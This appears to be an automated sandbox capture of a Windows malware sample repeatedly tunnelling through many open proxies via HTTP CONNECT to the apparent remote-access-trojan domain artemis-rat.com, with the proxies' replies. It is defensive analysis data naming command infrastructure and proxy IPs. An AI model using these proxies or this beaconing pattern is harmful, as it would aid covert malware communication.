                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.144870043 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              732192.168.2.452406162.159.241.5807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.002227068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.163764954 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              733192.168.2.452417104.22.50.220807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.005105019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.159162045 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              734192.168.2.45230113.229.47.109807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.005140066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.334095955 CET222INHTTP/1.1 400 Bad Request
                                              Date: Mon, 11 Mar 2024 07:34:48 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              Content-Length: 12
                                              X-Kong-Response-Latency: -7.62939453125e-06
                                              Server: kong/2.8.1
                                              Data Raw: 42 61 64 20 72 65 71 75 65 73 74 0a
                                              Data Ascii: Bad request


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              735192.168.2.4523475.196.111.30200607284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.005374908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              736192.168.2.45233791.189.177.18631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.011790037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.330384016 CET1286INHTTP/1.1 403 Forbidden
                                              Server: squid/5.7
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3628
                                              X-Squid-Error: ERR_ACCESS_DENIED 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              X-Cache: MISS from lb1
                                              X-Cache-Lookup: NONE from lb1:3128
                                              Via: 1.1 lb1 (squid/5.7)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              737192.168.2.452314185.49.30.580817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.013099909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              738192.168.2.45243274.48.7.43807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.022326946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              739192.168.2.45226643.133.136.20888007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.022815943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.387162924 CET536INHTTP/1.1 403 Forbidden
                                              Server: nginx/1.22.1
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 555
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.22.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable M


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              740192.168.2.452449104.17.171.235807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.022902012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.178200006 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              741192.168.2.45236341.231.37.7631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.024250031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.365641117 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              742192.168.2.45046069.61.200.104361817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.024585962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              743192.168.2.451770112.30.155.83127927284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.030533075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.793275118 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              744192.168.2.452249187.40.1.1221287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.040915012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.760473013 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:54.867659092 CET1286INHTTP/1.1 500 Internal Server Error
                                              Server: squid/5.2
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:53 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 17038
                                              X-Squid-Error: ERR_CANNOT_FORWARD 0
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 39 66 39 66 39 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 65 67 6f 65 2c 20 27 53 65 67 6f 65 20 55 49 27 2c 20 27 44 65 6a 61 56 75 20 53 61 6e 73 27 2c 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 76 69 73 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 63 37 63 61 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 72 65 74 69 63 65 6e 63 69 61 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 20 65 6c 6c 69 70 73 69 73 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 39 36 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 43 41 4e 4e 4f 54 5f 46 4f 52 57 41 52 44 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 20 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 20 73 74 79 6c 65 3d 22 6d 69 6e 2d 77 69 64 74 68 3a 35 30 30 70 78 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 38 22 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 0a 3c 69 6d 67 20 63 6c 61 73 73 3d 22 64 65 6e 79 5f 6c 6f 67 6f 22 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 4e 63 41 41 41 41 76 43 41 59 41 41 41 42
                                              Data Ascii: <!DOCTYPE html><html style="background-color: #f9f9f9 !important;font-family:Segoe, 'Segoe UI', 'DejaVu Sans', 'Trebuchet MS', Verdana, sans-serif;"> <head> <meta charset="UTF-8"> <title>Aviso</title> <meta content='width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no' name='viewport'> <style> html{background: #3c7ca0 !important;} body{background: transparent !important;height: 100%;} .reticencias { text-overflow: ellipsis; white-space: nowrap; overflow: hidden; width:96%; margin-bottom:0 !important; } </style> </head> <body id="ERR_CANNOT_FORWARD" style="font-size:12px; "> <div class="container" align="center"> <div class="row" style="min-width:500px"> <div class="col-xs-8" style="text-align:center;padding-top:50px; padding-bottom:10px"><img class="deny_logo" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANcAAAAvCAYAAAB


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              745192.168.2.451331154.239.3.18580817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.049700975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.054111004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.069782972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.163412094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.256908894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:56.368273973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:08.381907940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:32.397506952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
